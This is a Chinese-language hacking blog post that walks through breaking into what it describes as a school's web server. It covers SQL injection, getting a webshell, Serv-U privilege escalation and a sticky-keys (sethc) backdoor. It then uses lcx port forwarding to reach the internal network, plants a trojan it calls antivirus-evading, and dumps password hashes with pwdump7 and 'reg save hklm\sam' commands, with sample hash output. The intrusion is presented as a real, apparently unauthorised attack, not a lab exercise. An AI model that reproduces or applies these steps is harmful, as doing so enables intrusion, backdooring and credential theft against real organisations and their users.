比较详细适合新手大牛路过…
说做就做,日之
独立ip服务器没有挂其他站点
ping ip返回值判断对方机器是w2003服务器
在收集一下端口开了21 135 139
ftp xxx返回
220 serv-u ftp server v6.4 for winsock ready..
装了sever u
经搜集确定服务器为win2003+asp+iis6.0+mssql
打开目标3389没反应学校网站应该是放在内网
一、获取webshell
首先从网站的asp程序入手
(and注入1=1页面正常1=2页面错误有注入)
返回到了首页,再来
(or注入如果or1=1返回错误即有注入返回正确页面则无注入)
又返回到了首页看来这个网站的管理员还算有点安全知识
不死心继续观察利用搜索引擎载入到啊d扫扫site:xxxx.com asp?id=
随手一个单引号
yes出现注入猜解猜解
激动的时候到了md5 not found暴力破解吧没兴趣
继续回到主站看到了一个留言板抱着试试的心态
抓包提交后既然有数据库地址
ok小失误成功得到地址
fckeditor漏洞也可以利用
这里就不做演示了
二、服务器提权
扫描了下端口
本地打开21,1433,3389等端口,对外只开放了80端口
试着看下可写目录极品出来了
这就好办了su提权ok替换sethc成功加入管理
内网进不去那我们就把它转发出来用到lcx端口转发
使用lcx进行内网端口转发图文讲解
上传lcx.exe
设置好之后成功进入服务器
在配置个马儿反弹成功上线这个马儿过内杀软全过瑞星就直接pass吧
三、内网渗透
既然网站的安全这么差我就直接抓hash吧
使用pwdump7提取系统密码hash值
工具临时下载地址:
杀毒软件可能会报毒。请自行检测。
使用说明:
pwdump7可以在cmd下提取出系统中的用户的密码hash (包括lm和ntlm),当然必须要有系统权限.提取出了hash,再用ophcrack破出明文密码,对进一步渗透是有很大帮助的,经我测试,在xp下是可以成功提取出来的.这个工具需要一个dll文件支持,压缩包中带的,只需放到一个文件夹中即可,用法很简单,直接输入
d:\>pwdump7.exe
pwdump v7.1 - raw password extractor
author: andres tarasco acuna
url:
administrator:500:25fc25a0ca659e57acedb07452ab7a8e:6c1b3be8d28cd3e7ab63122c8a572ddf:::
guest:501:0e175c3eff8eed1652440321fcd91e4e:2850991451071a5b7a95f2977d4aaef0:::
atarasco:1001:45c6aeedc857a06dc595236f8f5fecaa:d0253497114c1b4cc337210f4580a716:::
用法:
pwdump7.exe (dump system passwords)
pwdump7.exe -s <samfile> <systemfile> (dump passwords from files)
pwdump7.exe -d <filename> [destionation] (copy filename to destionation)
pwdump7.exe -h (show this help)
-s 是从一个sam文件中提取hash,这个文件在%systemroot%\config\sam,这里.
-d 是把一个文件复制到另一个位置,d:\>pwdump7.exe -d c:\pagefile.sys pagefile.dmp 从这个例子中可以看出,他的特别之处在于,可以把进程正在占用的文件复制成功.
解决提示libeay32.dll找不到或缺少的问题
拷贝libeay32.dll到windows/system32下即可
在这里我给大家一个简单的方法老外抓hash的方法
reg save hklm\system system
reg save hklm\sam sam
操作成功完成后自己就拿工具去破吧
感谢老大mr cool给我的工具
他的网站
我这个内网主机只有两台而且没开3389
我就不继续渗透了
如对本文有疑问, 点击进行留言回复!!
我要评论
网友评论